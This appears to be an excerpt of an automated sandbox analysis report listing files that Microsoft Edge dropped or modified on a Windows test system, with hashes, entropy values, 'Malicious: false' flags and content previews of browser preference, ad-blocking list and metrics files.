SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xzMLmZQhVIFtUPIKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOXKoRTuiVIos
MD5:	FB7B33A9A15EAC4D01D1EEEA2BC4E1A4
SHA1:	BAA9C34D509CD105F27CBFE4E989E4F56009ED4F
SHA-256:	EAC23EFB3E4B76079EF25717FB54076A1F9C343382DC82895F3746E37583C27E
SHA-512:	39B5033CD75D535229F08855834987008592E18A3CF4A674AFD4707F9127EFD7FC7AB4E55256287295A7097A566998681A386A8BCAC67BBD9984C403FA53ABFD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2adced15-92fa-4423-9806-96149f51e7a9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45958
Entropy (8bit):	6.088890698384921
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQc5dXkVLmZQhVIFtUPI9N2aPEC1oOwWE7RTupzKscDX//Nqf:QMk1rT8H1Xz98aPEIoOoRTuik
MD5:	CD0B882D43E898687B781B83FBA8E6E2
SHA1:	28D9ECCA4696CF297701B036E51EF0CA07094EA7
SHA-256:	D2413C905302832B62A456E300002382F755512D3B17351637D1E1DEFD7E18A2
SHA-512:	3F01DD0BE646E8B83B54FAF7916DD638D0AD39FFC545B5059D125F786BB8CB67C3D1E963F5C8D61C97E390E9AD75D41E4477AAA0DB4BDBB1C2EBEE95B333F824
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"07b23afb-84f8-4bcd-aacb-154279a25749"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430153"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\43c0e4d6-63b9-418c-9513-0c2a3fb77c5f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6cb7b0d2-0ecc-4c82-91c4-a9bd5d7e87ba.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44637
Entropy (8bit):	6.096861891491217
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4krMLmZ+2VCaFVVKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynRKoRTuiVIos
MD5:	C2FAED19D3BD0D85DF6BCF1A9D056F83
SHA1:	20AFCDCBF076DE61975001920C2D4B9A2B12DC00
SHA-256:	6AD935644E2B656C0BF05CE0896AC700D60AF308423454228451A15F0C538955
SHA-512:	AB6421056B9DC5E8F7138A11637B972DDF39AC021D2326646FDC458FDE9A43C31F322445838AE1B839B073BB7359515B3DC797FA1328E6FB630CA040EE2FE7F9
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640173185101434
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
MD5:	68DDA50FDB9AF6E86F170412111C6190
SHA1:	B3171ED37DBCB85AA186B62063672E4E3A218DFE
SHA-256:	56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
SHA-512:	71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\c9a0a03b-0faa-4915-bd81-756dad03adea.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640173185101434
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
MD5:	68DDA50FDB9AF6E86F170412111C6190
SHA1:	B3171ED37DBCB85AA186B62063672E4E3A218DFE
SHA-256:	56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
SHA-512:	71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD241-1670.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04823174888495206
Encrypted:	false
SSDEEP:	192:lMCi/Pc0pqtmxnOAQJYeJ/7qiRD80JEYg7XzYIdJEmAfdqh+JNV9URQ34DWDoyns:lMz/E0ctO0E1dhhONoHWDN08T2RGOD
MD5:	26BDA5FB727005052A57846520911315
SHA1:	895255F9D3D2A0904D7F84204E02DF09EF7168B6
SHA-256:	82C7BAAC8DC2D87CB4CAB380749A221790C5FC52886B87595BAFDF186B3450EA
SHA-512:	49E1991563D865AEA5AF12D616285511A90E2D5685188A8D0C578084094A5B18F014AFEDA806BA1080CF639C3404C3A8570FAE4E449364209DCFB61836F9CF94
Malicious:	false
Preview:	...@..@...@.....C.].....@...............(l...[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".hajjel20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G..>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2........6....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD242-19C0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4980898489871132
Encrypted:	false
SSDEEP:	6144:282p3y8eQ5bo/NpI4eGqD1A4R0hy4laH:G5bsNoRi4
MD5:	44C89746941446AFB1340C9965281CD2
SHA1:	735F7CAE2CCB535CD8C5CDD93FD1741AA7DF2333
SHA-256:	50B79CE67712789ED5B5BDAC536E44A6D7B0F231861E2E7A658AA88CB2D52CB5
SHA-512:	99785EC85920A4281CBCCD4566904B92269B20F170C6F58BE5FBEB00AD684DF24D49C270F44BF3E5E2B7D26CB7DE7F12C1AD50D39097CF9945593CCD9A52CC3E
Malicious:	false
Preview:	...@..@...@.....C.].....@...................@...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".hajjel20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U?:K...G..>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.195531555605597
Encrypted:	false
SSDEEP:	3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
MD5:	B43C738AB1422F16D60B4C4B49CC7DF2
SHA1:	98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
SHA-256:	C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
SHA-512:	07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
Malicious:	false
Preview:	sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\35db2c39-a6e0-4838-b0b6-89924e116302.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.577315277305042
Encrypted:	false
SSDEEP:	768:7GUWRzWPdNfKF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP32kx5VrwdJpJtuD:7GUWRzWPdNfKFu1jaO32S5eDtM
MD5:	21671A7CB761FBA25CB269192760551A
SHA1:	D7EC43603D5FBF76511268667FF9E63E99DA5571
SHA-256:	2B337B542B6FC9B8C3F83127F36F9ED4738EF52FAE6E7D5287FDCC47B35840D7
SHA-512:	8166CF4E9C6C52BCF51F6F0E7C54B06C96D24220667423C12A6538D6FEED7E0F0542A49FB89ECC1C5EEEFC9B78306B8A345B29AEF5C22CF0C8985B2AEBCBCF6B
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903747659779","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903747659779","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3a7eecc7-33c6-4281-ad0a-edd0b3625cd3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14639), with no line terminators
Category:	dropped
Size (bytes):	14645
Entropy (8bit):	5.480714181412605
Encrypted:	false
SSDEEP:	384:stpQ1sGoXYouGHc7DYDTqbGVQwWo67NIv:s30obmbGm4uo
MD5:	416A526441ED77766F34D4CE460FC407
SHA1:	31EB40BDA3F137FD6B243A8C34CF696BA737B5E3
SHA-256:	E56DC8ABE96308EF922856E6E6FC97619D6C57E82FE68EA482FB46F6148F43CD
SHA-512:	6049FC556A10EEA34A9397253DD6EA406EA4B8243ED88AC7717EE030BA68F71F6939B0485E0D9ECB25523E46616B0B565B59965803F54222B7CD621B411E288F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\51cacb55-a3cb-451d-b6bf-a7b5b6496cd7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14802), with no line terminators
Category:	dropped
Size (bytes):	14808
Entropy (8bit):	5.476182109073216
Encrypted:	false
SSDEEP:	384:stpQ1sGoXYouGHc7DYDTqbGVQwWi+f7NIv:s30obmbGmyio
MD5:	D958737D97935155C5CFE391C674F426
SHA1:	B8CBDA917CF86B431B0FAEF6D70E4B49DFDBB878
SHA-256:	94C1AEE20885046D70C5B945C1A5F49268232110DBD526A55C5A77F3F50DAAE8
SHA-512:	15AE20F10963838339351524F39EF5EBCF79A4EAC1A956EAA409DBAB3BE06912DEFE7FE91BA63568D92CFA31FD985CEAC068CAA09CBA0FB0DBEE9EF5AFA7466E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5b62955e-5504-4928-b056-ea0049b31c85.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5cb5f8fa-a822-42ea-b018-683827ed063d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14802), with no line terminators
Category:	modified
Size (bytes):	14808
Entropy (8bit):	5.476056124323991
Encrypted:	false
SSDEEP:	384:stpQ1sGoXYouGHc7DYDTqbGVQwWZ+f7NIv:s30obmbGmpio
MD5:	5A7A0B57202A333CAED44BBF226245F5
SHA1:	3BF6385F218B246E33AC4E7C8ED126C4F79D78E5
SHA-256:	CAE08BF708173FBBEAC5DBE1671645E6596D5BDE24E391DC9B821042713EB791
SHA-512:	948F397F8B1DF0890F0CCB1F4D82B27152608EF31B045CA4673E5F0AE0628BF42C395A5F2968A0366D4F9AAA7E4F8BBFDF2DFD08B02057E6C0AFA8BFE7A0E691
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\68e1d420-a77e-4069-8580-8386bdb4288e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	5.223867385503494
Encrypted:	false
SSDEEP:	192:stpkdp1sPeoIa34Fon2ekTdPYDj8ibV+Fv9Qwt4o3q7NIiPPYJ:stpQ1sGoXYouUbGVQwWo67NIv
MD5:	254CCB6B1E1274CF8B55E5F2D239816F
SHA1:	FD4E20FAFC839059BDA19C091ABBFFE17389FBFC
SHA-256:	CA87594455C9EA3584C05E939126EA07A79472E11C82E9B6370A05D4A48E30E7
SHA-512:	3097CC384222A6B46F70BEFBBB7FB6C42A39631DC891B53FCB51808EB02BB2F05513A862032B2DE49C9581A516AD67D347E780BAE0B10D93A12690F8A313AD0E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
